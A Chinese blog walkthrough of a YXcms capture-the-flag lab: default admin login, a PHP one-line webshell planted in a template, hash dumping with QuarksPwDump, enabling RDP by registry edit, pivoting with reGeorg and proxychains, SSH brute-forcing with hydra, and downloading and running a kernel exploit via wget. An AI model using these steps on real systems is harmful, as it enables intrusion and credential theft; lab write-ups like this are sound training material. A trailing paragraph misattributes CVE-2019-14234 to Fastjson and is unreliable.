靶场笔记-----YXcms靶场

前言:YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。

实验环境:

windows 2003 + linux +kali
注:windows 2003 为外网,可以访问到物理机,网卡为nat3;
物理机访问----->192.168.100.130

下载地址:

https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A
提取码:xbb5

实验要求:

本环境共设置3个flag,在实验过程中不允许操作虚拟机

步骤详解:

1.如果看到是cms,先去搜集信息,百度一下该cms已出现的漏洞。我是根据这个网址发现的漏洞https://zhuanlan.zhihu.com/p/52099335
2.根据前言,在网址后面加上/index.php?r=admin
用户名:admin;密码:123456;
在这里插入图片描述
3.进入后台getshell
在管理首页----前台模板----最新默认模板2013-2-1----管理模板文件----index_index.php
编辑上传一句话木马
在这里插入图片描述在这里插入图片描述

保存退出!
4.测试,发现一句话木马上传成功。
在这里插入图片描述
5.上菜刀,获取更多权限。
在这里插入图片描述
6.右键----虚拟终端----whoami,发现是system用户,不用提权。
在这里插入图片描述
7.上传QuarksPwDump.exe,
在终端输入C:\phpStudy2013\WWW\QuarksPwDump.exe --dump-hash-local获取密码
在这里插入图片描述在这里插入图片描述

8.通过cmd5解码,账户名:Administrator 密码:Hallo(记住,下面会用到)
9.接下来尝试远程登录。
首先在终端输入netstat -ano,发现3389端口未开启。
开启3386端口命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在这里插入图片描述

10.尝试远程登录。
在这里插入图片描述

11.通过上面破解的账号密码,远程登录
在这里插入图片描述

12.拿到flag1
在这里插入图片描述

13.进入外网后,收集有用信息。
结果发现xshell4新建会话有IP 和用户名。
14.尝试ping一下这个ip,可以ping通。
接下来尝试爆破密码。
通过菜刀往win2003上传reGeorg-master/tunnel.nosocker.php
物理机访问 http://192.168.100.130/tunnel.nosocher.php
在这里插入图片描述
15.接下来打开kali,运行reGeorg-master
在这里插入图片描述

16.编辑 /etc/proxychains.conf
socks5 127.0.0.1 8888
在这里插入图片描述在这里插入图片描述

17.python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocher.php
在这里插入图片描述

18.尝试通过ssh访问内网。
proxychains ssh 172.16.1.1(成功)
在这里插入图片描述
19.设置字典
在这里插入图片描述

20.用hydra爆破密码
账号:admin
密码:123456
在这里插入图片描述
21.用xshell4连接172.16.1.1
在这里插入图片描述

22.History收集近期使用的命令,拿到flag2
在这里插入图片描述
23.Uname -a 查看系统版本
在这里插入图片描述
24.查看id,用户为admin
在这里插入图片描述
25.利用内核版本,上传exp提权
在这里插入图片描述
26.输入命令:
wget 172.16.1.2/exp1 - O exp1
ls -l
chmod 777 exp1
./exp1
cd /root/
拿到flag3!Bingo!
在这里插入图片描述

  • 4
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值